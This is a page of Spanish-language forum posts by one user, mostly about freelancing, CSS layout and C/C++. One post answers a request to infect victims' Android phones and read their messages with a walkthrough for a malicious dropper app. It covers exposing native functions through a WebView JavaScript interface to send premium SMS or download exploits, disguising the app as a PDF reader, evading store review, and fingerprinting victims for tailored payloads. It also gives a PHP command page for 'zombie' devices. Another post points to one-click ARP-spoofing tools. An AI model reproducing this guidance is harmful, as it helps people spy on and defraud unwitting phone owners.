Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - @XSStringManolo

#881
Cita de: Roger5 en 19 Enero 2020, 23:13 PM
Si logres encontrar un trabajo fiable y tengas muchos talentos en tales sectores como: programación, diseño web, analítica, idiomas, entonces sí, puedes ganar bien. De lo contrario podrás ganar alguito para poder sobrevivir pero no te tocará salir de casa para ir a la oficina.
Y seguridad? data-scientific? administracion de redes y sistemas? ingeniero de hardware?  analista?

En España Freelancer es prácticamente lo mismo que autónomo con la diferencia de que el trabajo es esporádico y puntual, por lo que si no lo ejerces con regularidad ni superas los ingresos mínimos, no necesitas declarar. Es decir, si mañana te programo un software, a la semana le hago una web a otro y al mes le arreglo el ordenador al vecino, soy frelancer. En cambio si te hago programas todas las semanas, entonces soy un autónomo en situación irregular.

El freelancer se conoce pero en España no está reconocido legalmente. Es decir, si se ponen pesados te empapelan porque la ley no te protege.
#882
Acabas antes formateando xDD Y como esté mínimamente bien hecho a poco que esté sin firmar y sin cabecera no te lo van a encontrar o no te van a encontrar todos los componentes y se puede restaurar. A lo mejor se descargó a través de un componente no malicioso como tal. A parte cualquier malware puede hacer cambios en el sistema para no ser detectado o moverse a un espacio de disco no indexado por el sistema.
#883
Cita de: EdePC en 18 Enero 2020, 14:11 PM
- Lo normal sería buscar alguna web que tenga un botón a gusto y ver sus estilos, lo mismo cn Bootstrap, también hay páginas para generar botones: https://www.bestcssbuttongenerator.com/
No me gusta usar código que no escribí yo. Suele tener cosas que no voy a usar y ocupan espacio.
#884
http://stringmanolo.ml/dhunter

Comportamiento deseado:
Al hacer click en el botón azul de enviar este debe girar, transformarse en un átomo y quedar posicionado de forma fija en la esquina inferior derecha.
Al tocar en cualquier parte de la pantalla menos en el átomo, debe volver a su posición inicial de botón.

Problemas:
1. A veces o casi siempre se para el botón a medio de camino, como si se tocase en otro elemento. Sobre todo en dispositivos landscape, laptops y pcs. En Android Portrait va más o menos bien siempre y cuano no pinches en el borde superior del botón. El botón es como si no se clickase. Le acabo de añadir un onclick en local y no funciona cuando el botón vuelve a su sitio. En cambio si cuando está el botón si va al sitio se activa el javascript.

2. Se resaltan los input text. Los bordes se resaltan y parpadean.

3. Hay veces que el botón se posiciona fuera de la pantalla al girar el dispositivo.

4. Esto no lo miré pero en landscape y pcs el botón parece que está posicionado en la esquina izquierda superior en vez de su posición real. Posiblemente sea del margen y sencillo de arreglar, pero esto aún no lo miré. No me ralla mucho esto.

5. Según el navegador o dispositivo funciona o no?

Comentario:
Si pulso y mantengo pulsado por más o menos 1 o 2 segundos, al soltar si funciona correctamente?

http://stringmanolo.ml/dhunter/css/cssdhunter.css
#885
Cita de: clay2332xd en 19 Enero 2020, 06:03 AM
He buscado mucho en Internet y veo que se recomienda encarecidamente c para esta tarea, pensé que era mejor c ++ por el hecho de incluir el POO.

También he leído que estos dos son ciertamente compatibles, pero no sé en qué ni hasta que medida. Ojalá puedan guiarme un poco con esto, estoy algo confundido.
Ambos son necesarios. A parte hay mucho código open source escrito en C++.
Son compatibles en el sentido que un compilador C++ también compila C. Esto significa que un programador tranquilamente puede escribir 1000 instrucciones en C y 2 en C++ y viceversa.
#886
Visibility solo afecta a textos y así.
Alterna entre display hidden y display block también.


Te recomiendo diseño responsive usando el viewport en lugar de px que se van a mostrar muy distintos dependiendo de cada pantalla.
Archivo html:
Código (html4strict) [Seleccionar]
<head>
 <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, width=device-width, height=device-height, target-densitydpi=device-dpi">
</head>

<body>
 <img src="imagen.png" class="botonImagen">
</body>

   

Archivo CSS:
Código (css) [Seleccionar]

/* Por Defecto */
.botonImagen {
 width: 5.5vw;
}

/* Monitores alta resolución. */
@media (min-width: 1281px) {

 .botonImagen {
   width: 2.75vw;
 }

}

/* Resolución común para pcs y portátiles. */
@media (min-width: 1025px) and (max-width: 1280px) {

 .botonImagen {
   width: 2.25vw;
 }

}

/* Tablets Ipads y similares resoluciones en modo vertical. */
@media (min-width: 768px) and (max-width: 1024px) and (orientation: portrait) {

 .botonImagen {
   width: 5.5vw;
 }

}

/* Tablets Ipads y similares resoluciones en modo horizontal. */
@media (min-width: 768px) and (max-width: 1024px) and (orientation: landscape) {

 .botonImagen {
   width: 2.25vw;
 }

}

/* Tables de baja resolución y Smartphones de alta resolución. Posición Horizontal */
@media (min-width: 481px) and (max-width: 767px) and (orientation: landscape) {

 .botonImagen {
   width: 2.25vw;
 }

}

/* Moviles Vertical */
@media (min-width: 320px) and (max-width: 480px) and (orientation: portrait) {
 
 .botonImagen {
   width: 5.5vw;
 }

}


Hay muchas otras formas de crear diseños adaptables a las pantallas.
vw viewportWidth es el % del ancho del viewport.

vh viewportHeight es el % del alto del viewport.

Si pones 100vw el elemento ocupara todo el espacio visible horizontalmente.

Ando haciendo un proyecto usando todos estos elementos. Puedes ver como no muestro de la misma forma la web en un smartphone o en un pc.
https://smlearningfullstack.000webhostapp.com/dhunter/indexBUENO.html
#887
Programación C/C++ / Re: Algorismo Sudoku
19 Enero 2020, 12:44 PM
Cita de: AlbertoBSD en 19 Enero 2020, 05:23 AM
Un Algoritmo es en papel o pseudocódigo no Existe tal cosa como algoritmo para Netbeans..

Saludos!
Un algoritmo son un grupo de instrucciones para resolver un problema. Puede estar en cualquier formato que se te ocurra.
#888
Hacking / Re: Hack por red wifi
18 Enero 2020, 23:59 PM
Z-Anti. Es para Android. Tiene MITM por ARP spoof a golpe de click. También scanner de vulns con su identificador CVE, entre otras cosas.

Algunos Android tienen oculto y preinstalado el TCPDUMP.
En algunos con chip MediaTek viene en el EngineerMode con el MTKLOGGER asociado al TCPDUMP que puedes activar tecleando en la aplicación por defecto del teléfono para llamadas un USSD.

El más común es *#*#3646633#*#* aunque depende de tu dispositivo. Algunos viene en Google. Si no te sale, tienes que hacer reversing del firmware de tu cacharro y buscarlo. Vienen hardcodeados.
#889
Cuando se para la instalación, sin tocarle a nada tira del cable. Se lo vuelves a enchufar y la instalación prosigue automáticamente hasta que vuelve a pasar el mismo tiempo y se vuelve a parar. Entonces tienes que volver a tirar del cable y a ponérselo de nuevo. Así en bucle hasta llegar al 100%. Se para más o menos cada 3'5% de la instalación.
#890
Hacking / Re: ¿Hack celular android?
18 Enero 2020, 23:32 PM
Cita de: beto1555 en 18 Enero 2020, 21:33 PM
Alguien sabe si existe ya un hack para infectar celulares android, que la victima descarge una app y la ejecute? y de ahi quede infectada y pueda ver sus mensajes llamadas etc?
https://github.com/StringManolo/SMJSB?files=1

El archivo A.html es una página web de ejemplo. A ti lo que te interesa es la función vibrate:
<script>
function vibrate(milliseconds) {
 Android.Vibrate(milliseconds);
}
</script>
Si el usuario visita esta página web el móvil vibrará. En contreto se lo metí al banner de la web. Cuando el usuario toca con el dedo el rectángulo, este cambia de color y el teléfono vibra.

Esto es posible porque desde java se puede exponer las funciones nativas del sistema.
De la mism forma que vibra, puede enviar un sms, hacer una llamada. Descargarte un exploit, rootear el sistema... Lo que te de la gana que te permita hacer el teléfono. Es todo igual de sencillo.

Qué tipo de malwares puedes desarrollar de un forma muy sencilla técnicamente de esta forma?
Un dialer por ejemplo. Son los típicos que mandan sms a un teléfono de pago subscribiéndose.

Como puedes distribuir la applicación de una forma sencilla y ocultar el código? Puedes utilizar una librería de javascript que lea pdfs. Simplemente sustituyes mi A.html por un archivo con una librería de javascript para leer pdf y le añades la llamada a tu función.
En este caso se llama Android.vibrate(milliseconds) para que sea reconocida pero podrías llamarla a.b(); Lo bueno es que ni siquiera necesitas buildear el proyecto con un html fijo. Simplemente le pones una url a cualquier página pública y lees el contenido. Cuando aparezca la palabra ho1a!!!! en ese sitio, tu código java lo interpreta y manda el sms. O montas una página php y cada persona que visite la página desde tu app, compruebas si es un usuario que infectaste tú, o un random. Si es un random le muestras una web normal. Si es un bot, le añades una llamada a función en medio de la página junto al código del lector del .pdf.
No es nada sofisticado, es todo lo contrario.

En el archivo actividadPrincipal.java tienes simplemente un visor de html con el motor de webkit, como si fuese un navegador. Y se le activa javascript. Así puede ver e interpretar páginas web. Muy útil para usar de bot por si quieres mandar al usuario hacer tareas en páginas con seguridad.

En este archivo te interesan varias cosas.
El userAgent usa uno de un servicio de Google online. Si borras el userAgent utiliza el por defecto del teléfono.
String MiUserAgent = "Mozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30";
MiWebView.getSettings().setUserAgentString(MiUserAgent);

Si haces spear delivery puedes editar el userAgent base y añadirle un pequeño cambio para identificarlo cuando visite tu web para mandarle un payload personalizado.

Despues tienes el trozo de código que llama a la interfaz. JSInterfaz estáz definido en otro archivo. "Android" es el nombre de la interfaz. Como te dije puedes llamarle como quieras. Es el identificador que usarás en el javascript de la web. Si vas a hacer un lector de pdf le puede llamar IsPDFOpen para despistar. MiWebView.addJavascriptInterface(new JSInterface(this), "Android");

El último trozo de código de este archivo que te interesa es este:
MiWebView.loadUrl("file:///android_asset/A.html");

Ahora mismo carga la web desde local, asique no necesitas tener acceso a internet para controlar el dispositivo.
Con la el mismo método puedes llamar a cualquier url. Ya sea de tu web o cualquier otra. Como va directa al motor puedes hacer cosas chulas como pasarle scripts directamente, meterle un eval para los parámetros, un uri que realice una descarga automática o el pseudoprotocolo de javacript. Si siquiera necesitas activar javascript para hacer estas cosas. Asique si quieres mayor seguridad puedes harcodear un dominio a la url y pasarle javascript en las respuestas por la url. Como se queda con el mismo document location haces un refresh y ya lo tienes a la escucha de nuevo.

El archivo JSInterfaz.java es super sencillo. Solo tienes que añadir tus funciones debajo de la de vibrate siguiendo el mismo formato.

Por último tienes 2 .xml uno para crear la interfaz, y otro para darle los permisos necesarios a la aplicación.

Esto más que el diseño de un malware, es una applicación diseñada para instalar otro malware. Una vez en el sistema, puede ser codeada para pasar totalmente desapercivida, firmada, subida a la store, etc.

Después desde tu web controlas a quien le das que. No te interesa infectar a los developers de Google que testén tu app. xD

La aplicaciones en Android normalmente necesitan instalaciones muy pesadas para ser desarrolladas. Esta aplicación la puedes crear tal cual usando el Java N-IDE desde tu Android en la playstore. Solo tienes que descargártela, crear un nuevo proyecto Android y añadir estos archivos. Le das a buildear y listo, ya tienes tu .apk para mandar.

Lo tal es que en tu web tengas un php. Algo estilo:
Código (php) [Seleccionar]
<!DOCTYPE html>
<html>
<head>
<meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport'/>
<title>SMZC</title>
</head>
<body>
 <?php

    $yourdomain 
$_SERVER['HTTP_HOST'];
    
$yourdomain preg_replace('/^www\./' '' $yourdomain);
   
    
$UserAgent=$_SERVER['HTTP_USER_AGENT'];
    
$BotUA 'zombie';
   
    
  
?>


<div id="ContenidoWeb">
<p><h3>Página Web:</h3></p>
<p>
 <?php
if ($UserAgent == $BotUA)
{
echo 
"Eres un Zombie<br>Comandos:<br>@SubirArchivo<br>@BajarArchivo<br>@EjecutarArchivo";
}

else
{
echo 
"Eres un visitante";

}
   
?>

</p>
</div>
</body>
</html>


Obviamente esto es solo un ejemplo.

Esta diseñado para ofrecer servicios customizados a diversos clientes con distintas necesidades sin verse limitado en el desarrollo por la seguridad de los navegadores. A veces los clientes se portan mal y necesitan un castigo :3